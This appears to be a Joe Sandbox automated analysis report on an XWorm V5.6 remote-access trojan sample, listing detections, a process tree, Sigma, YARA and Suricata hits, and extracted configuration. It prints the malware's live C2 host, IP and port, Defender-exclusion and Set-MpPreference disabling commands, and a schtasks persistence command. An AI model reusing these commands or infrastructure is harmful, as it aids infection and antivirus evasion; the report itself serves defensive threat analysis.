Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KJhsNv2RcI.exe

Overview

General Information

Sample name:KJhsNv2RcI.exe
renamed because original name is a hash value
Original sample name:2bd38b201c0c2fd95fcdc6824cdce1952ae7ed0b89f1ee52be2a27341903318c.exe
Analysis ID:1579063
MD5:88ef3bc08129685bf8a1a238487b60ec
SHA1:c313f0452d5906586e73534c9bbc94998211c733
SHA256:2bd38b201c0c2fd95fcdc6824cdce1952ae7ed0b89f1ee52be2a27341903318c
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs an instant shutdown (NtRaiseHardError)
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KJhsNv2RcI.exe (PID: 7356 cmdline: "C:\Users\user\Desktop\KJhsNv2RcI.exe" MD5: 88EF3BC08129685BF8A1A238487B60EC)
    • powershell.exe (PID: 7488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KJhsNv2RcI.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\AntiMalware.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AntiMalware.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7708 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AntiMalware.exe (PID: 7568 cmdline: C:\Users\user\AppData\Roaming\AntiMalware.exe MD5: 88EF3BC08129685BF8A1A238487B60EC)
  • AntiMalware.exe (PID: 6032 cmdline: "C:\Users\user\AppData\Roaming\AntiMalware.exe" MD5: 88EF3BC08129685BF8A1A238487B60EC)
  • AntiMalware.exe (PID: 8044 cmdline: "C:\Users\user\AppData\Roaming\AntiMalware.exe" MD5: 88EF3BC08129685BF8A1A238487B60EC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["analysis-warming.gl.at.ply.gg"], "Port": 13548, "Aes key": " (<123456789>)", "SPL": "<Xwormmm>", "Install file": "svhost.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
KJhsNv2RcI.exeJoeSecurity_XWormYara detected XWormJoe Security
    KJhsNv2RcI.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      KJhsNv2RcI.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xd370:$s6: VirtualBox
      • 0xd2ce:$s8: Win32_ComputerSystem
      • 0xefa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xeb7e:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\AntiMalware.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\AntiMalware.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\AntiMalware.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xd370:$s6: VirtualBox
          • 0xd2ce:$s8: Win32_ComputerSystem
          • 0xefa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xf043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xf158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xeb7e:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2822437837.000000000334A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.2822437837.0000000003301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.2821186755.00000000015F0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
              • 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
              • 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
              • 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true
              • 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
              • 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true
              • 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2
              • 0x509d:$s6: Set-MpPreference -MAPSReporting 0
              • 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6
              • 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
              • 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6
              • 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
              • 0x5422:$e2: Add-MpPreference -ExclusionPath
              00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xd170:$s6: VirtualBox
                • 0xd0ce:$s8: Win32_ComputerSystem
                • 0xeda6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xee43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xef58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xe97e:$cnc4: POST / HTTP/1.1
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.KJhsNv2RcI.exe.3400918.2.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                • 0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
                • 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                • 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true
                • 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
                • 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true
                • 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2
                • 0x329d:$s6: Set-MpPreference -MAPSReporting 0
                • 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6
                • 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
                • 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6
                • 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
                • 0x3622:$e2: Add-MpPreference -ExclusionPath
                0.2.KJhsNv2RcI.exe.15f0000.0.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
                • 0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
                • 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
                • 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                • 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true
                • 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
                • 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true
                • 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2
                • 0x329d:$s6: Set-MpPreference -MAPSReporting 0
                • 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6
                • 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
                • 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6
                • 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
                • 0x3622:$e2: Add-MpPreference -ExclusionPath
                0.0.KJhsNv2RcI.exe.e70000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.KJhsNv2RcI.exe.e70000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.KJhsNv2RcI.exe.e70000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xd370:$s6: VirtualBox
                    • 0xd2ce:$s8: Win32_ComputerSystem
                    • 0xefa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xf043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xf158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xeb7e:$cnc4: POST / HTTP/1.1
                    Click to see the 4 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KJhsNv2RcI.exe", ParentImage: C:\Users\user\Desktop\KJhsNv2RcI.exe, ParentProcessId: 7356, ParentProcessName: KJhsNv2RcI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KJhsNv2RcI.exe", ParentImage: C:\Users\user\Desktop\KJhsNv2RcI.exe, ParentProcessId: 7356, ParentProcessName: KJhsNv2RcI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\AntiMalware.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KJhsNv2RcI.exe, ProcessId: 7356, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiMalware
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KJhsNv2RcI.exe", ParentImage: C:\Users\user\Desktop\KJhsNv2RcI.exe, ParentProcessId: 7356, ParentProcessName: KJhsNv2RcI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', ProcessId: 7488, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\KJhsNv2RcI.exe, ProcessId: 7356, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AntiMalware.lnk
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\KJhsNv2RcI.exe", ParentImage: C:\Users\user\Desktop\KJhsNv2RcI.exe, ParentProcessId: 7356, ParentProcessName: KJhsNv2RcI.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe", ProcessId: 7708, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KJhsNv2RcI.exe", ParentImage: C:\Users\user\Desktop\KJhsNv2RcI.exe, ParentProcessId: 7356, ParentProcessName: KJhsNv2RcI.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe', ProcessId: 7488, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-20T18:59:19.013621+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T18:59:25.458427+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T18:59:37.247017+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T18:59:49.033343+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T18:59:49.284665+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T18:59:55.335220+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T19:00:19.021782+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T19:00:19.371204+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T19:00:19.723169+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T19:00:20.395198+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T19:00:21.743096+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T19:00:24.619212+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    2024-12-20T19:00:29.995913+010028528701Malware Command and Control Activity Detected147.185.221.2413548192.168.2.449764TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-20T18:59:25.471488+010028529231Malware Command and Control Activity Detected192.168.2.449764147.185.221.2413548TCP
                    2024-12-20T18:59:37.267701+010028529231Malware Command and Control Activity Detected192.168.2.449764147.185.221.2413548TCP
                    2024-12-20T18:59:49.287104+010028529231Malware Command and Control Activity Detected192.168.2.449764147.185.221.2413548TCP
                    2024-12-20T18:59:55.336096+010028529231Malware Command and Control Activity Detected192.168.2.449764147.185.221.2413548TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: KJhsNv2RcI.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                    Found malware configuration
                    Source: KJhsNv2RcI.exeMalware Configuration Extractor: Xworm {"C2 url": ["analysis-warming.gl.at.ply.gg"], "Port": 13548, "Aes key": " (<123456789>)", "SPL": "<Xwormmm>", "Install file": "svhost.exe", "Version": "XWorm V5.6"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeReversingLabs: Detection: 84%
                    Multi AV Scanner detection for submitted file
                    Source: KJhsNv2RcI.exeReversingLabs: Detection: 84%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: KJhsNv2RcI.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: KJhsNv2RcI.exeString decryptor: analysis-warming.gl.at.ply.gg
                    Source: KJhsNv2RcI.exeString decryptor: 13548
                    Source: KJhsNv2RcI.exeString decryptor: (<123456789>)
                    Source: KJhsNv2RcI.exeString decryptor: <Xwormmm>
                    Source: KJhsNv2RcI.exeString decryptor: XWorm V5.6
                    Source: KJhsNv2RcI.exeString decryptor: svhost.exe
                    Source: KJhsNv2RcI.exeString decryptor: %AppData%
                    Source: KJhsNv2RcI.exeString decryptor: AntiMalware.exe
                    Source: KJhsNv2RcI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: KJhsNv2RcI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.24:13548 -> 192.168.2.4:49764
                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49764 -> 147.185.221.24:13548
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: analysis-warming.gl.at.ply.gg
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 147.185.221.24 ports 1,3,4,5,8,13548
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: KJhsNv2RcI.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.KJhsNv2RcI.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.4:49764 -> 147.185.221.24:13548
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: analysis-warming.gl.at.ply.gg
                    Source: powershell.exe, 00000001.00000002.1787761477.000002254034F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 00000001.00000002.1787761477.000002254034F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: powershell.exe, 00000004.00000002.1889320195.0000029D46419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: powershell.exe, 00000004.00000002.1889320195.0000029D46419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro.com
                    Source: KJhsNv2RcI.exe, AntiMalware.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2865773480.000000001D600000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: powershell.exe, 00000001.00000002.1775201853.0000022537C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876405149.0000029D3E0A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2029842687.000001BB70364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2307436349.000001F3BE712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000B.00000002.2119318876.000001F3AE8C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
